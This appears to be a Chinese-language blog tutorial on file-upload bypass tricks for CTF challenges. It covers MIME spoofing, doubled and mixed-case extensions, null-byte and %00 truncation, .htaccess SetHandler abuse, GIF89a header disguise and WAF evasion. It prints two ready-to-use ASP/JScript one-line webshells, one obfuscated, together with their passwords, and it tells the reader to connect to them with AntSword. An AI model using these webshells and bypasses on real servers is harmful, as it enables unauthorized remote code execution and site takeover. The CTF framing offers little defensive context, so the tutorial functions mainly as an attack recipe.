一篇文章带你入门文件上传

先跟大家聊聊文件上传的基本操作：

基本格式：

content-disposition:xxxx; name="upload_file"; filename="xxxx";

content-type: image/jpeg

其实文件上传能动的也就基本是filename和适当添加一句话木马，还有改content-type（Mime值），如果文件名字过滤了php那就可以尝试写ASP木马，还有content-type（Mime值），这里用了qwsn大神的讲解：

3、content-type文件类型的检测绕过：抓包该包

（1）发现文件类型不被允许，猜测是MIME限制

（2）抓包改包，突破上传

修改前：

修改后：

放通后：

如果基本思路不能达到应有的目标，那么接下来我会由浅入深的带大家学习文件上传的一些骚操作

1.js前端检测

像这种由框弹出来的就直接F12删除源代码就好

2.双写绕过法

双写绕过原理：服务端对黑名单中的内容进行处理，且仅处理一次，所以可以通过双写后缀绕过．
如，黑名单中有＂php＂字样，上传文件名为＂1.php＂ 上传后文件变成＂1.＂
大致过程：
1，bp抓包
2.修改filename=“1.pphphp”
这里一定要在php里面写一个php，如果连着写都会被识别过滤。
3.连接蚁剑

3.php木马双后缀

因为扩展名检测时文件名的右边网左边读，当读到第一个点的时候就会确认文件类型

比如比如写个一句话木马，命名为1.php.jpg

再开启bp，再proxy功能中选择1.php.jpg文件上传，点击hex查看十六进制源代码，找到1.php后面的“."(点），对应的是2e，改为00，也就是代表空的意思，接下来就可以直接上传文件。

4.数据溢出绕过

在filename后面继续添加数据，让WAF认为还没检测完，比如：

name="upload_file"; filename="1.php";sajkdasdjkasjdldjklasdassacdnkadcnkdlkandklawkdawasdnkadnlkdnkawnkwdnakscnklasncfkakakdadlawldndanldnkadnklawnawkdnadk。。。。。

5.%00截断

在url中%00表示ascll码中的0 ，而ascii中0作为特殊字符保留，表示字符串结束，所以当url中出现%00时就会认为读取已结束，比如：

filename="x.php%00/.php"

6.hatccess

代码：
SetHandler application/x-httpd-php

原理：其中.htaccess文件内容：SetHandler application/x-http-php的意思是设置当前目录所有文件都使用php解析，那么无论上传任何文件，只要符合php语言代码规范，就会被当做PHP执行。不符合规则则报错。
做法：1。在本地创建一个.htacces文件，输入代码内容，**然后点击另存为，将保存类型设置为所有文件。

2.上传一句话木马
保存为 stack.jpg 文件

3.抓包连接蚁剑

7.GIF动图绕过

原理：本质上是文件欺骗

举个例子：之前做过一道题

Step1：上传正常jpg文件，没有问题，上传一句话木马伪装的jpg文件，提示格式不对，上传图片马，提示文件格式不对

Step2：上传一个09.php.jpg，用BP抓包，修改request中的内容，实现文件欺骗，让木马能够正确上传。Gif文件对应的是：GIF89a即可上传成功

8.黑名单过滤

比如文件名后缀大小写混合绕过，.php改成.phP然后上传即可。
 

9.ASP木马

如果题目过滤了PHP，那你可以写ASP一句话木马进行上传比如大神V写的：

<%@ Page Language = Jscript %>
<%var/-/-/P/-/-/=/-/-/“e”+“v”+/-/-/
“a”+“l”+"("+“R”+“e”+/-/-/“q”+“u”+“e”/-/-/+“s”+“t”+
“[/-/-/0/-/-/-/-/-/2/-/-/-/-/-/5/-/-/]”+
“,”+"""+“u”+“n”+“s”/-/-/+“a”+“f”+“e”+"""+")";eval
(/-/-/P/-/-/,/-/-/“u”+“n”+“s”/-/-/+“a”+“f”+“e”/-/-/);%> 密码 -7

<%@ Page Language=“Jscript”%><%eval(Request.Item[“xindong”],“unsafe”);%>

密码是webadmin

10.waf单引号漏洞

这里有时候做题时把filename”1.php“直接改成’1.php‘，因为它可能只会检测双引号的内容

希望大家能够有所收获！